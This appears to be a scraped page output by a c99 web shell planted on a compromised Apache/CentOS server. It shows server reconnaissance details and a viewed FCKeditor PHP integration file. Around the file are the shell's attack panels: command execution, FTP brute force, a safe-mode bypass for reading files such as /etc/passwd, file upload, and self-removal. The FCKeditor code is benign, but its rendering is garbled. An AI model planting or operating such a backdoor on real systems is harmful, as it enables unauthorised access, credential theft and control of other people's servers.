!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ealumni/fckeditor/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     fckeditor_php4.php (3.71 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * FCKeditor - The text editor for Internet - http://www.fckeditor.net
 * Copyright (C) 2003-2007 Frederico Caldeira Knabben
 *
 * == BEGIN LICENSE ==
 *
 * Licensed under the terms of any of the following licenses at your
 * choice:
 *
 *  - GNU General Public License Version 2 or later (the "GPL")
 *    http://www.gnu.org/licenses/gpl.html
 *
 *  - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
 *    http://www.gnu.org/licenses/lgpl.html
 *
 *  - Mozilla Public License Version 1.1 or later (the "MPL")
 *    http://www.mozilla.org/MPL/MPL-1.1.html
 *
 * == END LICENSE ==
 *
 * This is the integration file for PHP 4.
 *
 * It defines the FCKeditor class that can be used to create editor
 * instances in PHP pages on server side.
 */
include_once "../global.php";

class 
FCKeditor
{
    var 
$InstanceName ;
    var 
$BasePath ;
    var 
$Width ;
    var 
$Height ;
    var 
$ToolbarSet ;
    var 
$Value ;
    var 
$Config ;

    
// PHP 4 Constructor
    
function FCKeditor$instanceName )
    {
        
$this->InstanceName    $instanceName ;
        
$this->BasePath        $GLOBALS['PATH'].'/fckeditor/' ;
        
$this->Width        '100%' ;
        
$this->Height        '200' ;
        
$this->ToolbarSet    'Default' ;
        
$this->Value        '' ;

        
$this->Config        = array() ;
    }

    function 
Create()
    {
        echo 
$this->CreateHtml() ;
    }

    function 
CreateHtml()
    {
        
$HtmlValue htmlspecialchars$this->Value ) ;

        
$Html '<div>' ;
        
        if ( !isset( 
$_GET ) ) {
            global 
$HTTP_GET_VARS ;
            
$_GET $HTTP_GET_VARS ;
        }

        if ( 
$this->IsCompatible() )
        {
            if ( isset( 
$_GET['fcksource'] ) && $_GET['fcksource'] == "true" )
                
$File 'fckeditor.original.html' ;
            else
                
$File 'fckeditor.html' ;

            
$Link "{$this->BasePath}editor/{$File}?InstanceName={$this->InstanceName}" ;

            if ( 
$this->ToolbarSet != '' )
                
$Link .= "&amp;Toolbar={$this->ToolbarSet}" ;

            
// Render the linked hidden field.
            
$Html .= "<input type=\"hidden\" id=\"{$this->InstanceName}\" name=\"{$this->InstanceName}\" value=\"{$HtmlValue}\" style=\"display:none\" />" ;

            
// Render the configurations hidden field.
            
$Html .= "<input type=\"hidden\" id=\"{$this->InstanceName}___Config\" value=\"" $this->GetConfigFieldString() . "\" style=\"display:none\" />" ;

            
// Render the editor IFRAME.
            
$Html .= "<iframe id=\"{$this->InstanceName}___Frame\" src=\"{$Link}\" width=\"{$this->Width}\" height=\"{$this->Height}\" frameborder=\"0\" scrolling=\"no\"></iframe>" ;
        }
        else
        {
            if ( 
strpos$this->Width'%' ) === false )
                
$WidthCSS $this->Width 'px' ;
            else
                
$WidthCSS $this->Width ;

            if ( 
strpos$this->Height'%' ) === false )
                
$HeightCSS $this->Height 'px' ;
            else
                
$HeightCSS $this->Height ;

            
$Html .= "<textarea name=\"{$this->InstanceName}\" rows=\"4\" cols=\"40\" style=\"width: {$WidthCSS}; height: {$HeightCSS}\">{$HtmlValue}</textarea>" ;
        }

        
$Html .= '</div>' ;

        return 
$Html ;
    }

    function 
IsCompatible()
    {
        return 
FCKeditor_IsCompatibleBrowser() ;
    }

    function 
GetConfigFieldString()
    {
        
$sParams '' ;
        
$bFirst true ;

        foreach ( 
$this->Config as $sKey => $sValue )
        {
            if ( 
$bFirst == false )
                
$sParams .= '&amp;' ;
            else
                
$bFirst false ;

            if ( 
$sValue === true )
                
$sParams .= $this->EncodeConfig$sKey ) . '=true' ;
            else if ( 
$sValue === false )
                
$sParams .= $this->EncodeConfig$sKey ) . '=false' ;
            else
                
$sParams .= $this->EncodeConfig$sKey ) . '=' $this->EncodeConfig$sValue ) ;
        }

        return 
$sParams ;
    }

    function 
EncodeConfig$valueToEncode )
    {
        
$chars = array(
            
'&' => '%26',
            
'=' => '%3D',
            
'"' => '%22' ) ;

        return 
strtr$valueToEncode,  $chars ) ;
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.014 ]--